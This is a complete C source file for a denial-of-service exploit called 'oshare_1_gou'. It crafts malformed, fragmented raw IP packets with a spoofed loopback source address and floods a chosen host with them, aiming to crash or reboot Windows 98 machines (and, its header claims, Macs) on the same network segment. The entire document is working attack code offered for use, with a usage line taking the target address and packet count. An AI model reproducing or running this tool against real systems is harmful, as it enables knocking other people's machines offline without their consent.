Exploit code to crash (BSOD) Windows98 machines with malformed packets.
c18592cd0ddecd34eaa2f74ed2587c3765cbbe4944d27a4857d87fef795ef294
/****************************************************************************/
/* [ oshare_1_gou ver 0.1 ] -- Dressing up No.1 -- */
/* */
/* */
/* This program transmits the "oshare" packet which starts a machine aga- */
/* in or crash. But, because it can't pass through the router, it can be */
/* carried out only in the same segment. */
/* "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */
/* nged, it has already tested that it becomes possible to kill Mac, too. */
/* ----------------------------------------- */
/* Written by R00t Zer0 */
/* E-Mail : defcon0@ugtop.com */
/* Web URL : http://www.ugtop.com/defcon0/index.htm */
/****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>
u_short in_cksum( u_short *, int );
int send_oshare_packet( int, u_long );
u_short
in_cksum( u_short *addr, int len )
{
int nleft = len;
u_short *w = addr;
int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*( u_char *)( &answer ) = *( u_char *)w;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum & 0xffff );
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}
int
send_oshare_packet( int sock_send, u_long dst_addr )
{
char *packet;
int send_status;
struct iphdr *ip;
struct sockaddr_in to;
packet = ( char *)malloc( 40 );
ip = ( struct iphdr *)( packet );
memset( packet, 0, 40 );
ip->version = 4;
ip->ihl = 11;
ip->tos = 0x00;
ip->tot_len = htons( 44 );
ip->id = htons( 65535 );
ip->frag_off = htons( 16383 );
ip->ttl = 0xff;
ip->protocol = IPPROTO_UDP;
ip->saddr = htonl( inet_addr( "127.0.0.1" ) );
ip->daddr = dst_addr;
ip->check = in_cksum( ( u_short *)ip, 40 );
to.sin_family = AF_INET;
to.sin_port = htons( 0x123 );
to.sin_addr.s_addr = dst_addr;
send_status = sendto( sock_send, packet, 40, 0,
( struct sockaddr *)&to, sizeof( struct sockaddr ) );
free( packet );
return( send_status );
}
int
main( int argc, char *argv[] )
{
char tmp_buffer[ 1024 ];
int loop, loop2;
int sock_send;
u_long src_addr, dst_addr;
u_short src_port, dst_port;
struct hostent *host;
struct sockaddr_in addr;
time_t t;
if( argc != 3 )
{
printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] );
exit( -1 );
}
t = time( 0 );
srand( ( u_int )t );
memset( &addr, 0, sizeof( struct sockaddr_in ) );
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr( argv[1] );
if( addr.sin_addr.s_addr == -1 )
{
host = gethostbyname( argv[1] );
if( host == NULL )
{
printf( "Unknown host %s.\n", argv[1] );
exit( -1 );
}
addr.sin_family = host->h_addrtype;
memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
}
memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );
if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1)
{
perror( "Getting raw send socket" );
exit( -1 );
}
printf( "\n\"Oshare Packet\" sending" );
fflush( stdout );
for( loop = 0; loop < atoi( argv[2] ); loop++ )
{
for( loop2 = 0; loop2 < 1000; loop2++ )
send_oshare_packet( sock_send, dst_addr );
fprintf( stderr, "." );
fflush( stdout );
}
printf( "\n\nDone.\n\n" );
fflush( stdout );
close( sock_send );
exit( 0 );
}